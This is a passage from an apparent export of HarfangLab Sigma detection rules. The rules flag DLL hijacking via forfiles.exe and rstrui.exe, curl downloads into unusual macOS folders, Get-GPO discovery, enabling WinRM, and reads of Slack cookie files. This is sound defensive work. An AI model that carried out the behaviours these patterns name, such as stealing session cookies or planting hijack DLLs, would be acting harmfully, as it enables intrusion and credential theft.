library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'forfiles.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "728eca4f-f506-46e0-bd7e-6369503a3ec2",
"rule_name": "DLL Hijacking via forfiles.exe",
"rule_description": "Detects potential Windows DLL Hijacking via forfiles.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7291c7c2-bf8d-4a9e-82ef-2b0feb135ca5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617687Z",
"creation_date": "2026-03-23T11:45:34.617689Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617693Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1105_curl_download_susp_folder.yml",
"content": "title: File Downloaded to a Suspicious Folder via curl\nid: 7291c7c2-bf8d-4a9e-82ef-2b0feb135ca5\ndescription: |\n Detects a curl command-line containing an uncommon folder path.\n Attackers may download payloads to these folders to try to avoid detection or to have their payload deleted on reboot.\n It is recommended to investigate files that were downloaded, and to analyze the process that executed the curl command to determine whether this action was legitimate.\nreferences:\n - https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2024/06/20\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - classification.macOS.Source.Filesystem\n - classification.macOS.LOLBin.Curl\n - classification.macOS.Behavior.FileDownload\n - classification.macOS.Behavior.CommandAndControl\nlogsource:\n product: macos\n category: filesystem_event\ndetection:\n selection:\n ProcessImage|endswith: '/curl'\n Path|startswith:\n - '/Users/shared/'\n - '/private/var/tmp'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n Kind:\n - 'create'\n - 'rename'\n\n exclusion_jamf:\n - ProcessAncestors|contains: '/usr/local/jamf/bin/jamf'\n - ProcessParentCommandLine|contains: '/Library/Application Support/JAMF/tmp/'\n\n exclusion_avast:\n ProcessParentCommandLine|startswith: '/bin/bash /Applications/Avast.app/Contents/Backend/scripts/update/shepherd.sh'\n\n exclusion_lua:\n ProcessCommandLine: 'curl -sSL -D /tmp/plenary_curl_????????.headers -X POST -H Content-Type: application/json -d @/tmp/lua_?????? 
http://*:*/exa.language_server_pb.LanguageServerService/*'\n Path: '/private/tmp/plenary_curl_????????.headers'\n\n exclusion_adode:\n ProcessParentImage|endswith: '/AcroInstallAlert.app/Contents/MacOS/AcroInstallAlert'\n ProcessCommandLine: 'usr/bin/curl -H Cache-Control: no-cache https://acroipm2.adobe.com/assets/installer/osx/DC/installpings_c/scamini/entryPackage/preinstall/'\n\n exclusion_homebrew:\n ProcessParentImage|startswith: '/opt/homebrew/'\n\n exclusion_nix:\n ProcessImage|startswith: '/nix/store/'\n Path|startswith: /private/tmp/nix-build-'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7291c7c2-bf8d-4a9e-82ef-2b0feb135ca5",
"rule_name": "File Downloaded to a Suspicious Folder via curl",
"rule_description": "Detects a curl command-line containing an uncommon folder path.\nAttackers may download payloads to these folders to try to avoid detection or to have their payload deleted on reboot.\nIt is recommended to investigate files that were downloaded, and to analyze the process that executed the curl command to determine whether this action was legitimate.\n",
"rule_creation_date": "2024-06-20",
"rule_modified_date": "2025-03-07",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7296ec56-8aef-43db-aa54-6ef122690e39",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082578Z",
"creation_date": "2026-03-23T11:45:34.082580Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082585Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rstrui.yml",
"content": "title: DLL Hijacking via rstrui.exe\nid: 7296ec56-8aef-43db-aa54-6ef122690e39\ndescription: |\n Detects potential Windows DLL Hijacking via rstrui.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rstrui.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\ktmw32.dll'\n - '\\SPP.dll'\n - '\\SRCORE.dll'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n - '\\wer.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7296ec56-8aef-43db-aa54-6ef122690e39",
"rule_name": "DLL Hijacking via rstrui.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rstrui.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "729fe232-6628-4198-8f7f-d0a755c02c73",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605796Z",
"creation_date": "2026-03-23T11:45:34.605799Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605807Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md#atomic-test-5---msft-get-gpo-cmdlet",
"https://attack.mitre.org/techniques/T1615/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1615_group_policy_discovery_powershell.yml",
"content": "title: Group Policy Information Discovered via PowerShell\nid: 729fe232-6628-4198-8f7f-d0a755c02c73\ndescription: |\n Detects the access to group policy information using Get-GPO PowerShell cmdlet.\n Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment.\n It is recommended to investigate the process responsible for the GPO discovery to look for malicious content or other suspicious actions.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md#atomic-test-5---msft-get-gpo-cmdlet\n - https://attack.mitre.org/techniques/T1615/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/12/26\nmodified: 2025/01/13\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1615\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_cmdlet:\n PowershellCommand|contains: 'Get-GPO '\n\n selection_arg:\n PowershellCommand|contains:\n - ' -Do '\n - ' -Dom '\n - ' -Doma '\n - ' -Domai '\n - ' -Domain '\n\n exclusion_lepide:\n ProcessParentImage:\n - '?:\\Program Files (x86)\\Lepide Data Security Platform\\GPELMPro.exe'\n - '?:\\Program Files (x86)\\Lepide Data Security Platform\\FSA\\LepideELMProPerm.exe'\n PowershellCommand|contains: '; Get-GPO -GUID '\n\n # https://support.microsoft.com/en-gb/topic/ms14-025-vulnerability-in-group-policy-preferences-could-allow-elevation-of-privilege-may-13-2014-60734e15-af79-26ca-ea53-8cd617073c30\n exclusion_ms14:\n PowershellCommand|contains|all:\n - 'Function Enum-SettingsWithCpassword'\n - '# GPMC tree paths'\n - '# 
Recursively obtain all the xml files within the SYVOL location'\n - '# Build GPO name from GUID extracted from filePath'\n - 'Get-GPO -Guid $gpoGuid'\n\n # https://www.powershellgallery.com/packages/GPOZaurr/0.0.155/Content/GPOZaurr.psm1\n exclusion_gpozaurr:\n - PowershellCommand|contains|all:\n - '$GroupPolicies = Get-GPO @getGPOSplat'\n - 'Get-GPOZaurr - Processing '\n - PowershellScriptPath:\n - '?:\\Program Files\\WindowsPowerShell\\Modules\\GPOZaurr\\\\*\\GPOZaurr.psm1'\n - '?:\\Users\\\\*\\WindowsPowerShell\\Modules\\GPOZaurr\\\\*\\GPOZaurr.psm1'\n\n exclusion_ninjarmm:\n PowershellScriptPath: '?:\\ProgramData\\NinjaRMMAgent\\scripting\\\\**.ps1'\n\n exclusion_asbuildreport:\n PowershellScriptPath:\n - '?:\\Program Files\\WindowsPowerShell\\Modules\\AsBuiltReport.Microsoft.AD\\\\*\\Get-AbrADOU.ps1'\n - '?:\\Program Files\\WindowsPowerShell\\Modules\\AsBuiltReport.Microsoft.AD\\\\*\\Get-AbrADGPO.ps1'\n\n exclusion_tenable1:\n PowershellCommand|contains|all:\n - 'function Get-ExistingGpoId {'\n - '$installedGpoNames = @($GPODisplayName, \"Tenable for AD\", \"Alsid for AD\")'\n exclusion_tenable2:\n PowershellCommand|contains|all:\n - 'function Check-ExistingGpos {'\n - 'Write-Host \"[-] Checking whether IOA script is runnable.\"'\n exclusion_tenable3:\n PowershellCommand|contains|all:\n - 'function Uninstall-ByGpo {'\n - 'Write-Host \"[-] GPO name to be deployed: $CleaningGPODisplayName\"'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "729fe232-6628-4198-8f7f-d0a755c02c73",
"rule_name": "Group Policy Information Discovered via PowerShell",
"rule_description": "Detects access to group policy information using the Get-GPO PowerShell cmdlet.\nAdversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend into the environment.\nIt is recommended to investigate the process responsible for the GPO discovery to look for malicious content or other suspicious actions.\n",
"rule_creation_date": "2022-12-26",
"rule_modified_date": "2025-01-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1615"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "72abdac0-7335-48c5-9b95-d61407043f00",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621241Z",
"creation_date": "2026-03-23T11:45:34.621243Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621247Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management",
"https://learn.microsoft.com/en-us/powershell/scripting/learn/remoting/winrmsecurity?view=powershell-7.2",
"https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2",
"https://attack.mitre.org/techniques/T1021/006/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1021_006_enable_winrm_powershell.yml",
"content": "title: WinRM Enabled via PowerShell\nid: 72abdac0-7335-48c5-9b95-d61407043f00\ndescription: |\n Detects when Windows Remote Management (WinRM) is enabled via a PowerShell cmdlet.\n Windows Remote Management is a common Windows service that is used to interact with a remote system and is used, in particular, by PowerShell Remoting.\n This can be used by an attacker to move laterally within an organisation.\n It is recommended to determine if this activity is legitimate by correlating any unusual authentications following this alert and to whitelist recurring configuration scripts.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management\n - https://learn.microsoft.com/en-us/powershell/scripting/learn/remoting/winrmsecurity?view=powershell-7.2\n - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2\n - https://attack.mitre.org/techniques/T1021/006/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/11/04\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.006\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains: 'Enable-PSRemoting'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n # https://github.com/PowerShell/PowerShell/blob/master/src/System.Management.Automation/engine/remoting/commands/CustomShellCommands.cs\n exclusion_function:\n PowershellCommand|contains|all:\n - 'function Enable-PSRemoting'\n - 'Enable-PSSessionConfiguration @PSBoundParameters'\n - '# Enable all Session Configurations'\n - 
'# first try to enable all the sessions'\n - '# Construct SID for network users'\n\n # https://github.com/PowerShell/PowerShell/blob/master/src/System.Management.Automation/engine/remoting/commands/CustomShellCommands.cs#L3994\n # Function Test-WinRMQuickConfigNeeded is used in Enable-PSRemoting to detect if Set-WSManQuickConfig needs to be run or not.\n exclusion_function_test:\n PowershellCommand|contains|all:\n - 'function Test-WinRMQuickConfigNeeded'\n - '# check if WinRM service is running'\n - '$winrmQuickConfigNeeded = Test-WinRMQuickConfigNeeded'\n\n exclusion_gehealthcare:\n PowershellScriptPath:\n - '?:\\Program Files\\GE Healthcare\\Solution Deployer Framework\\Modules\\Utility\\Connectivity.ps1'\n - '?:\\Program Files (x86)\\GE Healthcare\\Solution Deployer Framework\\Modules\\Utility\\Connectivity.ps1'\n\n exclusion_puppetlabs:\n ProcessParentImage: '?:\\Program Files\\Puppet Labs\\Puppet\\puppet\\bin\\ruby.exe'\n ProcessCommandLine|contains: 'powershell.exe -executionPolicy bypass -command *confWinrmHttps.ps1 '\n\n exclusion_azure:\n - ProcessParentImage: '?:\\WindowsAzure\\GuestAgent_*\\WindowsAzureGuestAgent.exe'\n - ProcessGrandparentImage: '?:\\WindowsAzure\\GuestAgent_*\\WindowsAzureGuestAgent.exe'\n\n exclusion_boxstarter:\n ProcessParentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n PowershellScriptPath: '?:\\ProgramData\\Boxstarter\\Boxstarter.Chocolatey\\\\*.ps1'\n\n exclusion_ccm1:\n ProcessParentImage: '?:\\Windows\\CCM\\CcmExec.exe'\n exclusion_ccm2:\n ProcessParentImage: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n PowershellScriptPath: '?:\\WINDOWS\\CCM\\SystemTemp\\\\????????-????-????-????-????????????.ps1'\n\n exclusion_manageengine:\n ProcessCommandLine: '*;../lib/AdventNetUpdateManagerInstaller.jar;*'\n ProcessParentImage: '*\\bin\\wrapper.exe'\n\n exclusion_admincenter1:\n ProcessParentImage: '?:\\Program Files\\WindowsAdminCenter\\Service\\WindowsAdminCenterLauncher.exe'\n ProcessParentSigned: 
'true'\n ProcessParentSignature: 'Microsoft Corporation'\n exclusion_admincenter2:\n - ProcessProduct: 'Windows Admin Center (v2)'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n - ProcessGrandparentProduct: 'Windows Admin Center (v2)'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Microsoft Corporation'\n exclusion_admincenter3:\n PowershellScriptPath: '?:\\Program Files\\WindowsAdminCenter\\PowerShellModules\\Microsoft.WindowsAdminCenter.Configuration\\Microsoft.WindowsAdminCenter.Configuration.psm1'\n exclusion_admincenter4:\n ProcessCommandLine: 'Powershell.exe -WindowStyle Hidden -File ?:\\Packages\\Plugins\\Microsoft.AdminCenter.AdminCenter\\\\*.ps1'\n\n exclusion_ninjarmm:\n - ProcessGrandparentOriginalFileName: 'NinjaRMMAgent'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'NinjaOne LLC'\n - ProcessAncestors|contains: '|?:\\Program Files (x86)\\\\*\\NinjaRMMAgent.exe|'\n\n exclusion_wapt:\n ProcessGrandparentImage: '?:\\Program Files (x86)\\wapt\\waptpython.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "72abdac0-7335-48c5-9b95-d61407043f00",
"rule_name": "WinRM Enabled via PowerShell",
"rule_description": "Detects when Windows Remote Management (WinRM) is enabled via a PowerShell cmdlet.\nWindows Remote Management is a common Windows service that is used to interact with a remote system and is used, in particular, by PowerShell Remoting.\nThis can be used by an attacker to move laterally within an organisation.\nIt is recommended to determine if this activity is legitimate by correlating any unusual authentications following this alert and to whitelist recurring configuration scripts.\n",
"rule_creation_date": "2022-11-04",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.006",
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "72bb29dc-a52f-43a7-ab84-f003a519cd50",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617660Z",
"creation_date": "2026-03-23T11:45:34.617662Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617667Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1539/"
],
"name": "t1552_004_read_slack_sensitive_files_macos.yml",
"content": "title: Suspicious Access to Slack Sensitive Files\nid: 72bb29dc-a52f-43a7-ab84-f003a519cd50\ndescription: |\n Detects a suspicious access to Slack files that hold cookies or sensitive files.\n Adversaries may steal Slack application cookies and use them to gain access to the application without needing credentials.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1539/\ndate: 2024/06/18\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1539\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_files:\n Kind: 'read'\n Path:\n - '/Users/*/Library/Application Support/Slack/Cookies'\n - '/Users/*/Library/Application Support/Slack/storage/*'\n - '/Users/*/Library/Containers/com.tinyspeck.slackmacgap/Data/Library/Application Support/Slack/storage/*'\n - '/Users/*/Library/Containers/com.tinyspeck.slackmacgap/Data/Library/Application Support/Slack/Cookies'\n ProcessImage|contains: '?'\n\n filter_slack:\n ProcessImage:\n - '/Applications/Slack*.app/Contents/Frameworks/Slack Helper.app/Contents/MacOS/Slack Helper'\n - '/Applications/Slack*.app/Contents/MacOS/Slack'\n - '/Users/*/Slack*.app/Contents/Frameworks/Slack Helper.app/Contents/MacOS/Slack Helper'\n - '/Users/*/Slack*.app/Contents/MacOS/Slack'\n - '/Volumes/Slack/Slack*.app/Contents/Frameworks/Slack Helper.app/Contents/MacOS/Slack Helper'\n 
- '/Volumes/Slack/Slack*.app/Contents/MacOS/Slack'\n - '/Volumes/Slack 1/Slack.app/Contents/Frameworks/Slack Helper.app/Contents/MacOS/Slack Helper'\n - '/Volumes/Slack 1/Slack.app/Contents/MacOS/Slack'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint 
Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n 